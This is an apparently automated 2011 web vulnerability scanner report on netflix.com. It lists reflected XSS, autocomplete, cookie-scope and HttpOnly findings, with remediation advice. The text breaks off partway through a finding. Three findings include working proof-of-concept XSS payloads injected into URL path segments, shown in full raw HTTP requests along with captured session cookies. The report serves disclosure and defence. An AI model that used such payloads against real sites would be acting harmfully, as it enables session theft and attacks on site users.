XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, netflix.com Report generated by XSS.CX at Mon Aug 15 15:05:11 GMT-06:00 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. Cross-site scripting (reflected)
1.1. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 [REST URL parameter 2]
1.2. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 [REST URL parameter 3]
1.3. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 [REST URL parameter 4]
2. Password field with autocomplete enabled
3. Cookie scoped to parent domain
3.1. http://www.netflix.com/
3.2. http://www.netflix.com/Affiliates
3.3. http://www.netflix.com/AllGenresList
3.4. http://www.netflix.com/AllNewReleases
3.5. http://www.netflix.com/AppGallery
3.6. http://www.netflix.com/BrowseSelection
3.7. http://www.netflix.com/ContactUs
3.8. http://www.netflix.com/Default
3.9. http://www.netflix.com/Gift
3.10. http://www.netflix.com/MediaCenter
3.11. http://www.netflix.com/NetflixReadyDevices
3.12. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
3.13. http://www.netflix.com/clickstats
4. Cross-domain Referer leakage
4.1. http://www.netflix.com/Default
4.2. http://www.netflix.com/Gift
4.3. http://www.netflix.com/Movie/Iron-Man-2/70111470
4.4. http://www.netflix.com/NetflixReadyDevices
4.5. http://www.netflix.com/entryTrap.jsp
5. Cookie without HttpOnly flag set
5.1. http://www.netflix.com/
5.2. http://www.netflix.com/Affiliates
5.3. http://www.netflix.com/AllGenresList
5.4. http://www.netflix.com/AllNewReleases
5.5. http://www.netflix.com/AppGallery
5.6. http://www.netflix.com/BrowseSelection
5.7. http://www.netflix.com/ContactUs
5.8. http://www.netflix.com/Default
5.9. http://www.netflix.com/Gift
5.10. http://www.netflix.com/MediaCenter
5.11. http://www.netflix.com/NetflixReadyDevices
5.12. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
5.13. http://www.netflix.com/clickstats
6. Email addresses disclosed
7. Content type incorrectly stated
1. Cross-site scripting (reflected)
next
There are 3 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 [REST URL parameter 2]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 552fe"style%3d"x%3aexpression(alert(1))"1a6e8429755 was submitted in the REST URL parameter 2. This input was echoed as 552fe"style="x:expression(alert(1))"1a6e8429755 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /SubGenreList/Action_Adventure552fe"style%3d"x%3aexpression(alert(1))"1a6e8429755 /296/Comic_Books_and_Superheroes/642 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/AllGenresList User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440027472; nflxsid=112.1313440027472; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:34:32 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:34:33 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: lastHitTime=1313440473093; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440344198~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:33 GMT; Path=/ Set-Cookie: nflxsid=112.1313440473093; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:34:33 GMT; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440473097~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:33 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDA0NzMwOTc6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:34:33 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415273099; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:33 GMT; Path=/ Vary: Accept-Encoding Content-Length: 41738 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440473093, serverBeforeHtml: 1313440473100 };</script> <meta h...[SNIP]... <link rel="canonical" href="http://www.netflix.com/SubGenreList/Action_Adventure552fe"style="x:expression(alert(1))"1a6e8429755 /296/Comic_Books_and_Superheroes/642">...[SNIP]...
1.2. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57414"style%3d"x%3aexpression(alert(1))"af44e41f781 was submitted in the REST URL parameter 3. This input was echoed as 57414"style="x:expression(alert(1))"af44e41f781 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /SubGenreList/Action_Adventure/29657414"style%3d"x%3aexpression(alert(1))"af44e41f781 /Comic_Books_and_Superheroes/642 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/AllGenresList User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440027472; nflxsid=112.1313440027472; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:34:37 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:34:37 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: lastHitTime=1313440477723; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440344198~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:37 GMT; Path=/ Set-Cookie: nflxsid=112.1313440477723; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:34:37 GMT; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440477731~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:37 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDA0Nzc3MzE6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:34:37 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415277733; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:37 GMT; Path=/ Vary: Accept-Encoding Content-Length: 41711 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440477723, serverBeforeHtml: 1313440477734 };</script> <meta h...[SNIP]... <link rel="canonical" href="http://www.netflix.com/SubGenreList/Action_Adventure/29657414"style="x:expression(alert(1))"af44e41f781 /Comic_Books_and_Superheroes/642">...[SNIP]...
1.3. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d88"style%3d"x%3aexpression(alert(1))"62e5a2731d8 was submitted in the REST URL parameter 4. This input was echoed as a6d88"style="x:expression(alert(1))"62e5a2731d8 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroesa6d88"style%3d"x%3aexpression(alert(1))"62e5a2731d8 /642 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/AllGenresList User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440027472; nflxsid=112.1313440027472; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:34:42 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:34:43 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: lastHitTime=1313440483028; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440344198~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:43 GMT; Path=/ Set-Cookie: nflxsid=112.1313440483028; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:34:43 GMT; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440483035~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:43 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDA0ODMwMzU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:34:43 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415283037; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:34:43 GMT; Path=/ Vary: Accept-Encoding Content-Length: 41738 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440483028, serverBeforeHtml: 1313440483037 };</script> <meta h...[SNIP]... <link rel="canonical" href="http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroesa6d88"style="x:expression(alert(1))"62e5a2731d8 /642">...[SNIP]...
2. Password field with autocomplete enabled
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/BrowseSelection
Issue detail
The page contains a form with the following action URL:https://www.netflix.com/Registration The form contains the following password fields with autocomplete enabled:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /BrowseSelection HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; lastHitTime=1313439930896; nflxsid=112.1313439930896; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439930900~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5MzA5MDA6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414730902; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:25:43 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:25:43 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: lastHitTime=1313439943947; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943805~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: nflxsid=112.1313439943947; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439943951~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk5NDM5NTI6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:25:43 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414743954; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:43 GMT; Path=/ Set-Cookie: miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Set-Cookie: miscCache=0001IeyYfbanSwHbPg6eSxURzz9dxA4=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=BROWSE_SELECTION&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Content-Length: 68593 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313439943947, serverBeforeHtml: 1313439943957 };</script> <meta h...[SNIP]... <div id="regform2col" class="regform2col"> <form METHOD="POST" ACTION="https://www.netflix.com/Registration" NAME="register_form" onSubmit="return allowOnce(this);"> <input type="hidden" name="nextpage" value="http://www.netflix.com/">...[SNIP]... <td class="field"> <input class="inputf" TYPE="PASSWORD" SIZE="15" ID="password1" NAME="password1" value="" maxlength=60> </td>...[SNIP]... <td class="field"> <input class="inputf" TYPE="PASSWORD" SIZE="15" NAME="password2" value="" maxlength=60> </td>...[SNIP]...
3. Cookie scoped to parent domain
previous
next
There are 13 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
3.1. http://www.netflix.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313439904276; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:04 GMT; Path=/ nflxsid=112.1313439904277; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://netflix.mediaroom.com/index.php?s=43&item=402 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; vstCnt=1~1~1313414669406; lastHitTime=1313439890544; nflxsid=112.1313439890544; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4OTA1NDg6OnRjdz0xJmNxcz06"; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:25:03 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: https://www.netflix.com/Set-Cookie: lastHitTime=1313439904276; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:25:04 GMT; Path=/ Set-Cookie: nflxsid=112.1313439904277; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
3.2. http://www.netflix.com/Affiliates
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Affiliates
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440025205; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440024056~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ nflxsid=112.1313440025205; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440025209~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjUyMDk6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:05 GMT; Path=/ vstCnt=1~1~1313414825217; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:05 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Affiliates HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440020419; nflxsid=112.1313440020419; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440020423~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjA0MjM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414820425; 